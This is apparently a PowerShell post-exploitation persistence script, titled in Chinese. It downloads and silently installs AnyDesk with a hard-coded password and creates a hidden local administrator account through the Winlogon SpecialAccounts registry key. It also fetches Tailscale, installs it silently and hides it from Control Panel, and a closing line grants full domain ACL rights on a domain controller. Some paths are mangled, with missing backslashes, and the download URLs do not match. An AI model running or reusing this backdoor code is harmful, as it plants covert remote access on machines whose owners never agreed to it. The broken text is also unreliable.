后渗透维权

"[*] Download AnyDesk"$clnt = new-object System.Net.WebClient$url = "http://download.anydesk.com/AnyDesk.exe"$file = "C:\windows\temp\AnyDesk.exe"$clnt.DownloadFile($url,$file)"[*] Install anydesk"    cmd.exe /c "c:\windows\temp\AnyDesk.exe --install C:Users%USERNAME%AppDataLocalAnyDesk --start-with-win --silent""[*] set anydesk Admin!@#45"    cmd.exe /c "echo Admin!@#45 | C:Users%USERNAME%AppDataLocalAnyDeskAnyDesk.exe --set-password"    cmd.exe /c 'del c:\windows\temp\AnyDesk.exe > nul 2>&1'"[*] Creat user default""[*] Set default Whoami!@#45"    cmd.exe /c 'net user default "Whoami!@#45" /add > nul 2>&1'"[*] Add user to admin"    cmd.exe /c 'net localgroup Administrators default /add > nul 2>&1'    cmd.exe /c 'reg add "HKEY_LOCAL_MACHINESoftwareMicrosoftWindows NTCurrentVersionWinlogonSpecialAccountsUserlist" /v default /t REG_DWORD /d 0 /f > nul 2>&1'sleep 3    cmd.exe /c "for /f ""delims="" %i in ('C:Users%USERNAME%AppDataLocalAnyDeskAnyDesk.exe --get-id') do echo %i" > ID.txt $id = Get-Item -Path .ID.txt | Get-Content -Tail 1 "[*] ID anydesk $id"

$ping = ping -n3 pkgs.tailscale.com -w5 | findstr "bytes=32"if ($ping-match"bytes=32") {      "[*] Ativando suporte a TSL versao 1, 1.1, 1.2, 1.3"    [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls,[Net.SecurityProtocolType]::Tls11,[Net.SecurityProtocolType]::Tls12,[Net.SecurityProtocolType]::Ssl3    [Net.ServicePointManager]::SecurityProtocol = "Tls, Tls11, Tls12, Ssl3"$status = (get-service tailscale).DisplayName 2> $nulif ($status-match'tailscale') {"[*] TailScale is already part of the system"          }else          {try        {$Response = Invoke-WebRequest-Uri"https://pkgs.tailscale.com/stable/tailscale-setup-1.78.1-arm64.msi"$StatusCode = $Response.StatusCode        } catch {$StatusCode = $_.Exception.Response.StatusCode.value__        }if ($StatusCode-match'200') {"[*] Downloading Tailscale..."$ProgressPreference = 'SilentlyContinue';Measure-Command-Expression { Invoke-WebRequest-Uri https://pkgs.tailscale.com/stable/tailscale-setup-1.76.6-amd64.msi -OutFile$env:publictailscale-setup-1.76.6-amd64.msi         } -ErrorAction'SilentlyContinue' | Out-Null          }else          { "[*] Page not found"          }$msi = Test-Path$env:publictailscale-setup-1.76.6-amd64.msi -ErrorAction'SilentlyContinue'if ($msi-eq"true")        {"[*] Installing Tailscale..."        msiexec.exe /i $env:publictailscale-setup-1.76.6-amd64.msi TS_CHECKUPDATES="never" TS_INSTALLUPDATES="never" TS_NOLAUNCH="1" TS_UPDATEMENU="hide" /qn | Out-Nullsleep3"[*] Hiding Tailscale from Control Panel..."        reg add "HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionUninstall{4C041253-D35B-5889-A173-B08110EB2062}" /v SystemComponent /t REG_DWORD /d 1 /f | Out-Null"[*] Installation completed!"        }else        {"[*] Error downloading the file...""[*] - Installation file not found..."        }            }         }else         {"[!] Installation was aborted! Possible disconnection with the domain pkgs.tailscale.com""[!] - No connection to the domain pkgs.tailscdale.com"         }

Add-DomainObjectAcl -TargetIdentity "DC" -PrincipalIdentity $sid -Rights All-Verbose